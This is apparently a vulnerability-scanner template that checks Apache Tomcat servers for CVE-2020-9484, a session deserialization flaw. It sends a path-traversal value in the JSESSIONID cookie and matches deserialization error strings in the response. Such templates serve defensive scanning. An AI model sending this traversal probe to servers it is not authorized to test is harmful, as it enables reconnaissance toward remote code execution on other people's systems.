id: CVE-2020-9484
info:
  name: Apache Tomcat RCE by deserialization
  author: dwisiswant0
  severity: high
  description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
  tags: cve,cve2020,apache
  reference:
    - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
requests:
  - method: GET
    headers:
      Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
    path:
      - "{{BaseURL}}/index.jsp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        words:
          - "Exception"
          - "ObjectInputStream"
          - "PersistentManagerBase"
        condition: and
        part: body